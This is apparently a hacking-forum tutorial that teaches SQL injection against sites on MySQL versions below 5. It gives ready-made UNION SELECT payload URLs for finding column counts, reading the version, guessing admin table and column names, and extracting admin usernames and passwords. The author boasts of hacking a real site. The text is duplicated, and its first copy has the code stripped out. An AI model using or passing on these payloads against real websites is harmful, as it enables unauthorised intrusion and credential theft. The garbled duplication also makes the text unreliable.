How To Hack Sites That Have Lower MySQL Version Than 5
I'll make it easy and fast,simple and less theory.
What Will You Read About:
*Check For Vuln.
*Check How Much Columns Are There
*Check Does Union Works
*Check For Version
*Getting table and column name &Pulling Data Out.
Okey Letz start...
We are going to use an example like this:
*Check For Vuln.
Checking for vuln is same as in Normal SQL Injection With a string(') so the url will look like this:
and we will get something like
this means that the site is vuln to MySQL Injection
*Check How Much Columns Are There
Like i said like in normal MySQL INjection we do this with
So we go now to the url and try to find how many columns are there:
We got some message like
This means that there are 3 columns
*Check Does Union Works
With union we can select more data in one sql statement.
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works
*Check For Version
So when we tryped this:
some numbers lets say 2 have showed us on the screen now we change 2 into
so the url will looks like this:
and we get like a result something like this:
*Getting table and column name
And now is the real part where you learn about how to do this shit.
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) we need to guess the table names and column names.So this is the hard part in this injection.
-Why?
Well everysite is not on english langue i have recently hacked a site from belgium the columns and tables weren't like
they were completly different so this makes the injector(You/Hacker) works a lot harder you need to search for that kind of words than translate them a lotz a lotz of work and maybe everything will be for nothing. That is why i hate this Injection
So letz say the site have an english table names and column names .
common table names:
common column names:
Now letz check if there is a table name admin we do that doing this:
So if we see the number 2 on the screen table admin exsists if doesnt exsists probably we will get an error
so we move on we know there is a table with name admin now its time for the columns
If we get an error column name "username" doesn't exsists
so we try other:
It returns an data ex:
So we guessed the column user now its time for password:
Damn returns error there is no column name "password" lets try other:
w00t we got:
So Now we know that there is an table name:
with columns:
and we pulled the data from them and get:
Also we can use contact() to get everything in one request:
and we get:
Well that was it How to hack site with MySQL Injection Lower than 5 Hope You Like It Guys
What Will You Read About:
*Check For Vuln.
*Check How Much Columns Are There
*Check Does Union Works
*Check For Version
*Getting table and column name &Pulling Data Out.
Okey Letz start...
We are going to use an example like this:
Code:
http://site.com/news.php?id=5
Checking for vuln is same as in Normal SQL Injection With a string(') so the url will look like this:
Code:
http://site.com/news.php?id=5'
Code:
"You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right
*Check How Much Columns Are There
Like i said like in normal MySQL INjection we do this with
Code:
Order By
Code:
http://www.site.com/news.php?id=5 order by 1/* < -- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* < -- no error
http://www.site.com/news.php?id=5 order by 4/* < -- error
Code:
Unkown Column "4" in "order clause"
*Check Does Union Works
With union we can select more data in one sql statement.
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/
*
*Check For Version
So when we tryped this:
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
Code:
version() or @@version
Code:
http://www.si te.com/news.php?id=5 union select 1,@@version,3/*
Code:
4.1.33-log or 5.0.45 or similar.
And now is the real part where you learn about how to do this shit.
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) we need to guess the table names and column names.So this is the hard part in this injection.
-Why?
Well everysite is not on english langue i have recently hacked a site from belgium the columns and tables weren't like
Code:
username,user,userid,password,members.admin ect
So letz say the site have an english table names and column names .
common table names:
Code:
user,usres,admin,administrators,members,member,login
Code:
username,useremail,n_user,user_name,user,password,pass,upass,userpassword,userpass,hash,email,umail
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
so we move on we know there is a table with name admin now its time for the columns
Code:
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*
so we try other:
Code:
http://www.site.com/news.php?id=5 union all select 1,uname,3 from admin/*
Code:
Administrator
Code:
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*
Code:
http://www.site.com/news.php?id=5 union all select 1,upass,3 from admin/*
Code:
AdminPassword
Code:
admin
Code:
uname and upass
Code:
Administraotr:AdminPassword
Code:
http://www.site.com/news.php?id=5 union all select 1,concat(uname,0x3a,upass),3 from admin/*
Code:
Administrator:AdminPassword